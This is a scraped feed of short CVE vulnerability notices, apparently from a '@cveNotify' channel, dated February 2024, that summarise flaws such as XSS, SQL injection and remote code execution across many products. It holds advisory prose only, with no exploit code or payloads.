🚨 CVE-2023-22943In Splunk Add-on Builder (AoB) versions below 4.1.2 and the Splunk CloudConnect SDK versions below 3.1.3, requests to third-party APIs through the REST API Modular Input incorrectly revert to using HTTP to connect after a failure to connect over HTTPS occurs.🎖@cveNotify |
|
| 2024-02-16 17:07:31 |
🚨 CVE-2023-0003A file disclosure vulnerability in the Palo Alto Networks Cortex XSOAR server software enables an authenticated user with access to the web interface to read local files from the server.🎖@cveNotify |
|
| 2024-02-16 17:07:30 |
🚨 CVE-2022-20713A vulnerability in the VPN web client services component of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct browser-based attacks against users of an affected device. This vulnerability is due to improper validation of input that is passed to the VPN web client services component before being returned to the browser that is in use. An attacker could exploit this vulnerability by persuading a user to visit a website that is designed to pass malicious requests to a device that is running Cisco ASA Software or Cisco FTD Software and has web services endpoints supporting VPN features enabled. A successful exploit could allow the attacker to reflect malicious input from the affected device to the browser that is in use and conduct browser-based attacks, including cross-site scripting attacks. The attacker could not directly impact the affected device.🎖@cveNotify |
|
| 2024-02-16 17:07:26 |
🚨 CVE-2018-3721lodash node module before 4.17.5 suffers from a Modification of Assumed-Immutable Data (MAID) vulnerability via defaultsDeep, merge, and mergeWith functions, which allows a malicious user to modify the prototype of "Object" via __proto__, causing the addition or modification of an existing property that will exist on all objects.🎖@cveNotify |
|
| 2024-02-16 17:07:25 |
🚨 CVE-2005-2801xattr.c in the ext2 and ext3 file system code for Linux kernel 2.6 does not properly compare the name_index fields when sharing xattr blocks, which could prevent default ACLs from being applied.🎖@cveNotify |
|
| 2024-02-16 17:07:24 |
🚨 CVE-2001-1155TCP Wrappers (tcp_wrappers) in FreeBSD 4.1.1 through 4.3 with the PARANOID ACL option enabled does not properly check the result of a reverse DNS lookup, which could allow remote attackers to bypass intended access restrictions via DNS spoofing.🎖@cveNotify |
|
| 2024-02-16 16:37:38 |
🚨 CVE-2024-1342A flaw was found in OpenShift. The existing Cross-Site Request Forgery (CSRF) protections in place do not properly protect GET requests, allowing for the creation of WebSockets via CSRF.🎖@cveNotify |
|
| 2024-02-16 16:37:37 |
🚨 CVE-2024-24804Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in websoudan MW WP Form allows Stored XSS.This issue affects MW WP Form: from n/a through 5.0.6.🎖@cveNotify |
|
| 2024-02-16 16:37:36 |
🚨 CVE-2024-24803Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WPoperation Ultra Companion – Companion plugin for WPoperation Themes allows Stored XSS.This issue affects Ultra Companion – Companion plugin for WPoperation Themes: from n/a through 1.1.9.🎖@cveNotify |
|
| 2024-02-16 16:37:35 |
🚨 CVE-2024-24801Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in LogicHunt OWL Carousel – WordPress Owl Carousel Slider allows Stored XSS.This issue affects OWL Carousel – WordPress Owl Carousel Slider: from n/a through 1.4.0.🎖@cveNotify |
|
| 2024-02-16 16:37:32 |
🚨 CVE-2024-23740An issue in Kap for macOS version 3.6.0 and before, allows remote attackers to execute arbitrary code via the RunAsNode and enableNodeClilnspectArguments settings.🎖@cveNotify |
|
| 2024-02-16 16:37:31 |
🚨 CVE-2024-23741An issue in Hyper on macOS version 3.4.1 and before, allows remote attackers to execute arbitrary code via the RunAsNode and enableNodeClilnspectArguments settings.🎖@cveNotify |
|
| 2024-02-16 16:37:30 |
🚨 CVE-2024-23739An issue in Discord for macOS version 0.0.291 and before, allows remote attackers to execute arbitrary code via the RunAsNode and enableNodeClilnspectArguments settings.🎖@cveNotify |
|
| 2024-02-16 16:37:29 |
🚨 CVE-2024-23743An issue in Notion for macOS version 3.1.0 and before, allows remote attackers to execute arbitrary code via the RunAsNode and enableNodeClilnspectArguments components.🎖@cveNotify |
|
| 2024-02-16 16:07:26 |
🚨 CVE-2024-24713Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WP Auto Listings Auto Listings – Car Listings & Car Dealership Plugin for WordPress allows Stored XSS.This issue affects Auto Listings – Car Listings & Car Dealership Plugin for WordPress: from n/a through 2.6.5.🎖@cveNotify |
|
| 2024-02-16 16:07:25 |
🚨 CVE-2023-4571In Splunk IT Service Intelligence (ITSI) versions below below 4.13.3, 4.15.3, or 4.17.1, a malicious actor can inject American National Standards Institute (ANSI) escape codes into Splunk ITSI log files that, when a vulnerable terminal application reads them, can run malicious code in the vulnerable application. This attack requires a user to use a terminal application that translates ANSI escape codes to read the malicious log file locally in the vulnerable terminal. The vulnerability also requires additional user interaction to succeed. The vulnerability does not directly affect Splunk ITSI. The indirect impact on Splunk ITSI can vary significantly depending on the permissions in the vulnerable terminal application, as well as where and how the user reads the malicious log file. For example, users can copy the malicious file from Splunk ITSI and read it on their local machine.🎖@cveNotify |
|
| 2024-02-16 16:07:24 |
🚨 CVE-2015-10106** UNSUPPORTED WHEN ASSIGNED ** A vulnerability classified as critical was found in mback2k mh_httpbl Extension up to 1.1.7 on TYPO3. This vulnerability affects the function moduleContent of the file mod1/index.php. The manipulation leads to sql injection. The attack can be initiated remotely. Upgrading to version 1.1.8 is able to address this issue. The patch is identified as 429f50f4e4795b20dae06735b41fb94f010722bf. It is recommended to upgrade the affected component. VDB-230086 is the identifier assigned to this vulnerability. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.🎖@cveNotify |
|
| 2024-02-16 15:37:30 |
🚨 CVE-2023-39417IN THE EXTENSION SCRIPT, a SQL Injection vulnerability was found in PostgreSQL if it uses @extowner@, @extschema@, or @extschema:...@ inside a quoting construct (dollar quoting, '', or ""). If an administrator has installed files of a vulnerable, trusted, non-bundled extension, an attacker with database-level CREATE privilege can execute arbitrary code as the bootstrap superuser.🎖@cveNotify |
|
| 2024-02-16 15:37:29 |
🚨 CVE-2019-15900An issue was discovered in slicer69 doas before 6.2 on certain platforms other than OpenBSD. On platforms without strtonum(3), sscanf was used without checking for error cases. Instead, the uninitialized variable errstr was checked and in some cases returned success even if sscanf failed. The result was that, instead of reporting that the supplied username or group name did not exist, it would execute the command as root.🎖@cveNotify |
|
| 2024-02-16 14:37:25 |
🚨 CVE-2005-4868Shared memory sections and events in IBM DB2 8.1 have default permissions of read and write for the Everyone group, which allows local users to gain unauthorized access, gain sensitive information, such as cleartext passwords, and cause a denial of service.🎖@cveNotify |
|
| 2024-02-16 14:37:24 |
🚨 CVE-2001-1559The uipc system calls (uipc_syscalls.c) in OpenBSD 2.9 and 3.0 provide user mode return instead of versus rval kernel mode values to the fdrelease function, which allows local users to cause a denial of service and trigger a null dereference.🎖@cveNotify |
|
| 2024-02-16 14:07:53 |
🚨 CVE-2023-40057The SolarWinds Access Rights Manager was found to be susceptible to a Remote Code Execution Vulnerability. If exploited, this vulnerability allows an authenticated user to abuse a SolarWinds service resulting in remote code execution.🎖@cveNotify |
|
| 2024-02-16 14:07:52 |
🚨 CVE-2024-22226Dell Unity, versions prior to 5.4, contain a path traversal vulnerability in its svc_supportassist utility. An authenticated attacker could potentially exploit this vulnerability, to gain unauthorized write access to the files stored on the server filesystem, with elevated privileges.🎖@cveNotify |
|
| 2024-02-16 14:07:51 |
🚨 CVE-2024-22222Dell Unity, versions prior to 5.4, contains an OS Command Injection Vulnerability within its svc_udoctor utility. An authenticated malicious user with local access could potentially exploit this vulnerability, leading to the execution of arbitrary OS commands on the application's underlying OS, with the privileges of the vulnerable application.🎖@cveNotify |
|
| 2024-02-16 14:07:47 |
🚨 CVE-2024-22221Dell Unity, versions prior to 5.4, contains SQL Injection vulnerability. An authenticated attacker could potentially exploit this vulnerability, leading to exposure of sensitive information.🎖@cveNotify |
|
| 2024-02-16 14:07:46 |
🚨 CVE-2024-23517Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Start Booking Scheduling Plugin – Online Booking for WordPress allows Stored XSS.This issue affects Scheduling Plugin – Online Booking for WordPress: from n/a through 3.5.10.🎖@cveNotify |
|
| 2024-02-16 14:07:41 |
🚨 CVE-2024-1405A vulnerability was found in Linksys WRT54GL 4.30.18. It has been classified as problematic. This affects an unknown part of the file /wlaninfo.htm of the component Web Management Interface. The manipulation leads to information disclosure. The exploit has been disclosed to the public and may be used. The identifier VDB-253329 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-02-16 14:07:40 |
🚨 CVE-2024-24828pkg is tool design to bundle Node.js projects into an executables. Any native code packages built by `pkg` are written to a hardcoded directory. On unix systems, this is `/tmp/pkg/*` which is a shared directory for all users on the same local system. There is no uniqueness to the package names within this directory, they are predictable. An attacker who has access to the same local system has the ability to replace the genuine executables in the shared directory with malicious executables of the same name. A user may then run the malicious executable without realising it has been modified. This package is deprecated. Therefore, there will not be a patch provided for this vulnerability. To check if your executable build by pkg depends on native code and is vulnerable, run the executable and check if `/tmp/pkg/` was created. Users should transition to actively maintained alternatives. We would recommend investigating Node.js 21’s support for single executable applications. Given the decision to deprecate the pkg package, there are no official workarounds or remediations provided by our team. Users should prioritize migrating to other packages that offer similar functionality with enhanced security.🎖@cveNotify |
|
| 2024-02-16 14:07:36 |
🚨 CVE-2024-23639Micronaut Framework is a modern, JVM-based, full stack Java framework designed for building modular, easily testable JVM applications with support for Java, Kotlin and the Groovy language. Enabled but unsecured management endpoints are susceptible to drive-by localhost attacks. While not typical of a production application, these attacks may have more impact on a development environment where such endpoints may be flipped on without much thought. A malicious/compromised website can make HTTP requests to `localhost`. Normally, such requests would trigger a CORS preflight check which would prevent the request; however, some requests are "simple" and do not require a preflight check. These endpoints, if enabled and not secured, are vulnerable to being triggered. Production environments typically disable unused endpoints and secure/restrict access to needed endpoints. A more likely victim is the developer in their local development host, who has enabled endpoints without security for the sake of easing development. This issue has been addressed in version 3.8.3. Users are advised to upgrade.🎖@cveNotify |
|
| 2024-02-16 14:07:35 |
🚨 CVE-2022-0900Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in NetDataSoft DivvyDrive allows Stored XSS.This issue affects DivvyDrive: from unspecified before v.4.6.2.0.🎖@cveNotify |
|
| 2024-02-16 12:37:32 |
🚨 CVE-2024-22425Dell RecoverPoint for Virtual Machines 5.3.x contains a brute force/dictionary attack vulnerability. An unauthenticated remote attacker could potentially exploit this vulnerability, leading to launch a brute force attack or a dictionary attack against the RecoverPoint login form. This allows attackers to brute-force the password of valid users in an automated manner.🎖@cveNotify |
|
| 2024-02-16 10:37:31 |
🚨 CVE-2023-45860In Hazelcast Platform through 5.3.4, a security issue exists within the SQL mapping for the CSV File Source connector. This issue arises from inadequate permission checking, which could enable unauthorized clients to access data from files stored on a member's filesystem.🎖@cveNotify |
|
| 2024-02-16 09:37:27 |
🚨 CVE-2024-25466Directory Traversal vulnerability in React Native Document Picker before v.9.1.1 and fixed in v.9.1.1 allows a local attacker to execute arbitrary code via a crafted script to the Android library component.🎖@cveNotify |
|
| 2024-02-16 09:37:26 |
🚨 CVE-2023-51931An issue in alanclarke URLite v.3.1.0 allows an attacker to cause a denial of service (DoS) via a crafted payload to the parsing function.🎖@cveNotify |
|
| 2024-02-16 09:37:25 |
🚨 CVE-2024-22076MyQ Print Server before 8.2 patch 43 allows Unauthenticated Remote Code Execution.🎖@cveNotify |
|
| 2024-02-16 08:37:26 |
🚨 CVE-2023-49508Directory Traversal vulnerability in YetiForceCompany YetiForceCRM versions 6.4.0 and before allows a remote authenticated attacker to obtain sensitive information via the license parameter in the LibraryLicense.php component.🎖@cveNotify |
|
| 2024-02-16 05:37:24 |
🚨 CVE-2019-25067A vulnerability, which was classified as critical, was found in Podman and Varlink 1.5.1. This affects an unknown part of the component API. The manipulation leads to Remote Privilege Escalation. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-143949 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-02-16 04:37:29 |
🚨 CVE-2023-6451Publicly known cryptographic machine key in AlayaCare's Procura Portal before 9.0.1.2 allows attackers to forge their own authentication cookies and bypass the application's authentication mechanisms.🎖@cveNotify |
|
| 2024-02-16 02:37:32 |
🚨 CVE-2024-0031In attp_build_read_by_type_value_cmd of att_protocol.cc , there is a possible out of bounds write due to improper input validation. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2024-02-16 02:37:25 |
🚨 CVE-2023-40122In applyCustomDescription of SaveUi.java, there is a possible way to view other user's images due to a confused deputy. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2024-02-16 02:37:24 |
🚨 CVE-2023-40093In multiple files, there is a possible way that trimmed content could be included in PDF output due to a logic error in the code. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2024-02-16 02:07:25 |
🚨 CVE-2024-21410Microsoft Exchange Server Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2024-02-16 02:07:24 |
🚨 CVE-2020-3259A vulnerability in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to retrieve memory contents on an affected device, which could lead to the disclosure of confidential information. The vulnerability is due to a buffer tracking issue when the software parses invalid URLs that are requested from the web services interface. An attacker could exploit this vulnerability by sending a crafted GET request to the web services interface. A successful exploit could allow the attacker to retrieve memory contents, which could lead to the disclosure of confidential information. Note: This vulnerability affects only specific AnyConnect and WebVPN configurations. For more information, see the Vulnerable Products section.🎖@cveNotify |
|
| 2024-02-16 00:37:31 |
🚨 CVE-2022-41299IBM Cloud Transformation Advisor 2.0.1 through 3.3.1 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 237214.🎖@cveNotify |
|
| 2024-02-15 23:37:32 |
🚨 CVE-2023-40109In createFromParcel of UsbConfiguration.java, there is a possible background activity launch (BAL) due to a permissions bypass. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.🎖@cveNotify |
|
| 2024-02-15 23:37:25 |
🚨 CVE-2023-40104In ca-certificates, there is a possible way to read encrypted TLS data due to untrusted cryptographic certificates. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2024-02-15 23:37:24 |
🚨 CVE-2023-40100In discovery_thread of Dns64Configuration.cpp, there is a possible memory corruption due to a use after free. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2024-02-15 22:37:24 |
🚨 CVE-2024-25123MSS (Mission Support System) is an open source package designed for planning atmospheric research flights. In file: `index.py`, there is a method that is vulnerable to path manipulation attack. By modifying file paths, an attacker can acquire sensitive information from different resources. The `filename` variable is joined with other variables to form a file path in `_file`. However, `filename` is a route parameter that can capture path type values i.e. values including slashes (\). So it is possible for an attacker to manipulate the file being read by assigning a value containing ../ to `filename` and so the attacker may be able to gain access to other files on the host filesystem. This issue has been addressed in MSS version 8.3.3. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2024-02-15 22:07:25 |
🚨 CVE-2004-0389RealNetworks Helix Universal Server 9.0.1 and 9.0.2 allows remote attackers to cause a denial of service (crash) via malformed requests that trigger a null dereference, as demonstrated using (1) GET_PARAMETER or (2) DESCRIBE requests.🎖@cveNotify |
|
| 2024-02-15 22:07:24 |
🚨 CVE-2004-0119The Negotiate Security Software Provider (SSP) interface in Windows 2000, Windows XP, and Windows Server 2003, allows remote attackers to cause a denial of service (crash from null dereference) or execute arbitrary code via a crafted SPNEGO NegTokenInit request during authentication protocol selection.🎖@cveNotify |
|
| 2024-02-15 21:37:38 |
🚨 CVE-2004-2154CUPS before 1.1.21rc1 treats a Location directive in cupsd.conf as case sensitive, which allows attackers to bypass intended ACLs via a printer name containing uppercase or lowercase letters that are different from what is specified in the directive.🎖@cveNotify |
|
| 2024-02-15 21:37:31 |
🚨 CVE-2004-0184Integer underflow in the isakmp_id_print for TCPDUMP 3.8.1 and earlier allows remote attackers to cause a denial of service (crash) via an ISAKMP packet with an Identification payload with a length that becomes less than 8 during byte order conversion, which causes an out-of-bounds read, as demonstrated by the Striker ISAKMP Protocol Test Suite.🎖@cveNotify |
|
| 2024-02-15 21:37:30 |
🚨 CVE-2003-0625Off-by-one error in certain versions of xfstt allows remote attackers to read potentially sensitive memory via a malformed client request in the connection handshake, which leaks the memory in the server's response.🎖@cveNotify |
|
| 2024-02-15 21:37:26 |
🚨 CVE-2002-1820register.php in Ultimate PHP Board (UPB) 1.0 and 1.0b uses an administrative account Admin with a capital "A," but allows a remote attacker to impersonate the administrator by registering an account name of admin with a lower case "a."🎖@cveNotify |
|
| 2024-02-15 21:37:25 |
🚨 CVE-2001-0609Format string vulnerability in Infodrom cfingerd 1.4.3 and earlier allows a remote attacker to gain additional privileges via a malformed ident reply that is passed to the syslog function.🎖@cveNotify |
|
| 2024-02-15 21:07:32 |
🚨 CVE-2006-4095BIND before 9.2.6-P1 and 9.3.x before 9.3.2-P1 allows remote attackers to cause a denial of service (crash) via certain SIG queries, which cause an assertion failure when multiple RRsets are returned.🎖@cveNotify |
|
| 2024-02-15 21:07:26 |
🚨 CVE-2004-1940sipclient.cpp in KPhone 4.0.1 and earlier allows remote attackers to cause a denial of service (crash) via a STUN response packet with a large attrLen value that causes an out-of-bounds read.🎖@cveNotify |
|
| 2024-02-15 21:07:25 |
🚨 CVE-2001-1471prefs.php in phpBB 1.4.0 and earlier allows remote authenticated users to execute arbitrary PHP code via an invalid language value, which prevents the variables (1) $l_statsblock in prefs.php or (2) $l_privnotify in auth.php from being properly initialized, which can be modified by the user and later used in an eval statement.🎖@cveNotify |
|
| 2024-02-15 20:37:33 |
🚨 CVE-2006-2275Linux SCTP (lksctp) before 2.6.17 allows remote attackers to cause a denial of service (deadlock) via a large number of small messages to a receiver application that cannot process the messages quickly enough, which leads to "spillover of the receive buffer."🎖@cveNotify |
|
| 2024-02-15 20:37:27 |
🚨 CVE-2005-3847The handle_stop_signal function in signal.c in Linux kernel 2.6.11 up to other versions before 2.6.13 and 2.6.12.6 allows local users to cause a denial of service (deadlock) by sending a SIGKILL to a real-time threaded process while it is performing a core dump.🎖@cveNotify |
|
| 2024-02-15 20:37:26 |
🚨 CVE-2002-1869Heysoft EventSave 5.1 and 5.2 and Heysoft EventSave+ 5.1 and 5.2 does not check whether the log file can be written to, which allows attackers to prevent events from being recorded by opening the log file using an application such as Microsoft's Event Viewer.🎖@cveNotify |
|
| 2024-02-15 20:37:25 |
🚨 CVE-2001-0682ZoneAlarm and ZoneAlarm Pro allows a local attacker to cause a denial of service by running a trojan to initialize a ZoneAlarm mutex object which prevents ZoneAlarm from starting.🎖@cveNotify |
|
| 2024-02-15 20:07:36 |
🚨 CVE-2023-6937wolfSSL prior to 5.6.6 did not check that messages in one (D)TLS record do not span key boundaries. As a result, it was possible to combine (D)TLS messages using different keys into one (D)TLS record. The most extreme edge case is that, in (D)TLS 1.3, it was possible that an unencrypted (D)TLS 1.3 record from the server containing first a ServerHello message and then the rest of the first server flight would be accepted by a wolfSSL client. In (D)TLS 1.3 the handshake is encrypted after the ServerHello but a wolfSSL client would accept an unencrypted flight from the server. This does not compromise key negotiation and authentication so it is assigned a low severity rating.🎖@cveNotify |
|
| 2024-02-15 20:07:35 |
🚨 CVE-2023-5155Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Utarit Information Technologies SoliPay Mobile App allows SQL Injection.This issue affects SoliPay Mobile App: before 5.0.8.🎖@cveNotify |
|
| 2024-02-15 20:07:31 |
🚨 CVE-2023-4993Improper Privilege Management vulnerability in Utarit Information Technologies SoliPay Mobile App allows Collect Data as Provided by Users.This issue affects SoliPay Mobile App: before 5.0.8.🎖@cveNotify |
|
| 2024-02-15 20:07:30 |
🚨 CVE-2023-46838Transmit requests in Xen's virtual network protocol can consist ofmultiple parts. While not really useful, except for the initial partany of them may be of zero length, i.e. carry no data at all. Besides acertain initial portion of the to be transferred data, these parts aredirectly translated into what Linux calls SKB fragments. Such convertedrequest parts can, when for a particular SKB they are all of lengthzero, lead to a de-reference of NULL in core networking code.🎖@cveNotify |
|
| 2024-02-15 20:07:29 |
🚨 CVE-2024-20305A vulnerability in the web-based management interface of Cisco Unity Connection could allow an authenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the interface. This vulnerability exists because the web-based management interface does not properly validate user-supplied input. An attacker could exploit this vulnerability by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information.🎖@cveNotify |
|
| 2024-02-15 20:07:26 |
🚨 CVE-2023-42189Insecure Permissions vulnerability in Connectivity Standards Alliance Matter Official SDK v.1.1.0.0 , Nanoleaf Light strip v.3.5.10, Govee LED Strip v.3.00.42, switchBot Hub2 v.1.0-0.8, Phillips hue hub v.1.59.1959097030, and yeelight smart lamp v.1.12.69 allows a remote attacker to cause a denial of service via a crafted script to the KeySetRemove function.🎖@cveNotify |
|
| 2024-02-15 20:07:25 |
🚨 CVE-2023-0964A vulnerability classified as critical has been found in SourceCodester Sales Tracker Management System 1.0. Affected is an unknown function of the file admin/products/view_product.php. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The complexity of an attack is rather high. The exploitability is told to be difficult. VDB-221634 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-02-15 20:07:24 |
🚨 CVE-2023-0785A vulnerability classified as problematic was found in SourceCodester Best Online News Portal 1.0. Affected by this vulnerability is an unknown functionality of the file check_availability.php. The manipulation of the argument username leads to exposure of sensitive information through data queries. The attack can be launched remotely. The complexity of an attack is rather high. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used. The identifier VDB-220645 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-02-15 19:37:25 |
🚨 CVE-2009-1388The ptrace_start function in kernel/ptrace.c in the Linux kernel 2.6.18 does not properly handle simultaneous execution of the do_coredump function, which allows local users to cause a denial of service (deadlock) via vectors involving the ptrace system call and a coredumping thread.🎖@cveNotify |
|
| 2024-02-15 19:37:24 |
🚨 CVE-2007-1863cache_util.c in the mod_cache module in Apache HTTP Server (httpd), when caching is enabled and a threaded Multi-Processing Module (MPM) is used, allows remote attackers to cause a denial of service (child processing handler crash) via a request with the (1) s-maxage, (2) max-age, (3) min-fresh, or (4) max-stale Cache-Control headers without a value.🎖@cveNotify |
|
| 2024-02-15 19:07:45 |
🚨 CVE-2024-22022Vulnerability CVE-2024-22022 allows a Veeam Recovery Orchestrator user that has been assigned a low-privileged role to access the NTLM hash of the service account used by the Veeam Orchestrator Server Service.🎖@cveNotify |
|
| 2024-02-15 19:07:38 |
🚨 CVE-2024-24255A Race Condition discovered in geofence.cpp and mission_feasibility_checker.cpp in PX4 Autopilot 1.14 and earlier allows attackers to send drones on unintended missions.🎖@cveNotify |
|
| 2024-02-15 19:07:37 |
🚨 CVE-2024-1052Boundary and Boundary Enterprise (“Boundary”) is vulnerable to session hijacking through TLS certificate tampering. An attacker with privileges to enumerate active or pending sessions, obtain a private key pertaining to a session, and obtain a valid trust on first use (TOFU) token may craft a TLS certificate to hijack an active session and gain access to the underlying service or application.🎖@cveNotify |
|
| 2024-02-15 19:07:32 |
🚨 CVE-2020-35519An out-of-bounds (OOB) memory access flaw was found in x25_bind in net/x25/af_x25.c in the Linux kernel version v5.12-rc5. A bounds check failure allows a local attacker with a user account on the system to gain access to out-of-bounds memory, leading to a system crash or a leak of internal kernel information. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.🎖@cveNotify |
|
| 2024-02-15 19:07:31 |
🚨 CVE-2013-2094The perf_swevent_init function in kernel/events/core.c in the Linux kernel before 3.8.9 uses an incorrect integer data type, which allows local users to gain privileges via a crafted perf_event_open system call.🎖@cveNotify |
|
| 2024-02-15 19:07:26 |
🚨 CVE-2004-1602ProFTPD 1.2.x, including 1.2.8 and 1.2.10, responds in a different amount of time when a given username exists, which allows remote attackers to identify valid usernames by timing the server response.🎖@cveNotify |
|
| 2024-02-15 19:07:25 |
🚨 CVE-2003-0190OpenSSH-portable (OpenSSH) 3.6.1p1 and earlier with PAM support enabled immediately sends an error message when a user does not exist, which allows remote attackers to determine valid usernames via a timing attack.🎖@cveNotify |
|
| 2024-02-15 18:37:26 |
🚨 CVE-2023-6937wolfSSL prior to 5.6.6 did not check that messages in one (D)TLS record do not span key boundaries. As a result, it was possible to combine (D)TLS messages using different keys into one (D)TLS record. The most extreme edge case is that, in (D)TLS 1.3, it was possible that an unencrypted (D)TLS 1.3 record from the server containing first a ServerHello message and then the rest of the first server flight would be accepted by a wolfSSL client. In (D)TLS 1.3 the handshake is encrypted after the ServerHello but a wolfSSL client would accept an unencrypted flight from the server. This does not compromise key negotiation and authentication so it is assigned a low severity rating.🎖@cveNotify |
|
| 2024-02-15 18:37:25 |
🚨 CVE-2024-24215An issue in the component /cgi-bin/GetJsonValue.cgi of Cellinx NVT Web Server 5.0.0.014 allows attackers to leak configuration information via a crafted POST request.🎖@cveNotify |
|
| 2024-02-15 18:07:27 |
🚨 CVE-2024-23764Certain WithSecure products allow Local Privilege Escalation. This affects WithSecure Client Security 15 and later, WithSecure Server Security 15 and later, WithSecure Email and Server Security 15 and later, and WithSecure Elements Endpoint Protection 17 and later.🎖@cveNotify |
|
| 2024-02-15 18:07:26 |
🚨 CVE-2024-1150Improper Verification of Cryptographic Signature vulnerability in Snow Software Inventory Agent on Unix allows File Manipulation through Snow Update Packages.This issue affects Inventory Agent: through 7.3.1.🎖@cveNotify |
|
| 2024-02-15 18:07:25 |
🚨 CVE-2024-1149Improper Verification of Cryptographic Signature vulnerability in Snow Software Inventory Agent on MacOS, Snow Software Inventory Agent on Windows, Snow Software Inventory Agent on Linux allows File Manipulation through Snow Update Packages.This issue affects Inventory Agent: through 6.12.0; Inventory Agent: through 6.14.5; Inventory Agent: through 6.7.2.🎖@cveNotify |
|
| 2024-02-15 17:37:48 |
🚨 CVE-2024-20731Acrobat Reader versions 20.005.30539, 23.008.20470 and earlier are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2024-02-15 17:37:41 |
🚨 CVE-2023-47132An issue discovered in N-able N-central before 2023.6 and earlier allows attackers to gain escalated privileges via API calls.🎖@cveNotify |
|
| 2024-02-15 17:37:40 |
🚨 CVE-2024-1149Improper Verification of Cryptographic Signature vulnerability in Snow Software Inventory Agent on MacOS, Snow Software Inventory Agent on Windows, Snow Software Inventory Agent on Linux allows File Manipulation through Snow Update Packages.This issue affects Inventory Agent: through 6.12.0; Inventory Agent: through 6.14.5; Inventory Agent: through 6.7.2.🎖@cveNotify |
|
| 2024-02-15 17:07:35 |
🚨 CVE-2024-0167Dell Unity, versions prior to 5.4, contains an OS Command Injection Vulnerability in the svc_topstats utility. An authenticated attacker could potentially exploit this vulnerability, leading to the ability to overwrite arbitrary files on the file system with root privileges.🎖@cveNotify |
|
| 2024-02-15 17:07:34 |
🚨 CVE-2024-0165Dell Unity, versions prior to 5.4, contains an OS Command Injection Vulnerability in its svc_acldb_dump utility. An authenticated attacker could potentially exploit this vulnerability, leading to execution of arbitrary operating system commands with root privileges.🎖@cveNotify |
|
| 2024-02-15 17:07:31 |
🚨 CVE-2024-0164Dell Unity, versions prior to 5.4, contain an OS Command Injection Vulnerability in its svc_topstats utility. An authenticated attacker could potentially exploit this vulnerability, leading to the execution of arbitrary commands with elevated privileges.🎖@cveNotify |
|
| 2024-02-15 17:07:30 |
🚨 CVE-2024-24594A cross-site scripting (XSS) vulnerability in all versions of the web server component of Allegro AI’s ClearML platform allows a remote attacker to execute a JavaScript payload when a user views the Debug Samples tab in the web UI.🎖@cveNotify |
|
| 2024-02-15 17:07:29 |
🚨 CVE-2024-24592Lack of authentication in all versions of the fileserver component of Allegro AI’s ClearML platform allows a remote attacker to arbitrarily access, create, modify and delete files.🎖@cveNotify |
|
| 2024-02-15 16:37:31 |
🚨 CVE-2023-7081Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in POSTAHSİL Online Payment System allows SQL Injection.This issue affects Online Payment System: before 14.02.2024.🎖@cveNotify |
|
| 2024-02-15 16:37:30 |
🚨 CVE-2023-6255Use of Hard-coded Credentials vulnerability in Utarit Information Technologies SoliPay Mobile App allows Read Sensitive Strings Within an Executable.This issue affects SoliPay Mobile App: before 5.0.8.🎖@cveNotify |
|
| 2024-02-15 16:37:26 |
🚨 CVE-2023-4993Improper Privilege Management vulnerability in Utarit Information Technologies SoliPay Mobile App allows Collect Data as Provided by Users.This issue affects SoliPay Mobile App: before 5.0.8.🎖@cveNotify |
|
| 2024-02-15 16:37:25 |
🚨 CVE-2023-38646Metabase open source before 0.46.6.1 and Metabase Enterprise before 1.46.6.1 allow attackers to execute arbitrary commands on the server, at the server's privilege level. Authentication is not required for exploitation. The other fixed versions are 0.45.4.1, 1.45.4.1, 0.44.7.1, 1.44.7.1, 0.43.7.2, and 1.43.7.2.🎖@cveNotify |
|
| 2024-02-15 16:07:55 |
🚨 CVE-2023-6535A flaw was found in the Linux kernel's NVMe driver. This issue may allow an unauthenticated malicious actor to send a set of crafted TCP packages when using NVMe over TCP, leading the NVMe driver to a NULL pointer dereference in the NVMe driver, causing kernel panic and a denial of service.🎖@cveNotify |
|
| 2024-02-15 16:07:54 |
🚨 CVE-2024-23769Improper privilege control for the named pipe in Samsung Magician PC Software 8.0.0 (for Windows) allows a local attacker to read privileged data.🎖@cveNotify |
|
| 2024-02-15 16:07:53 |
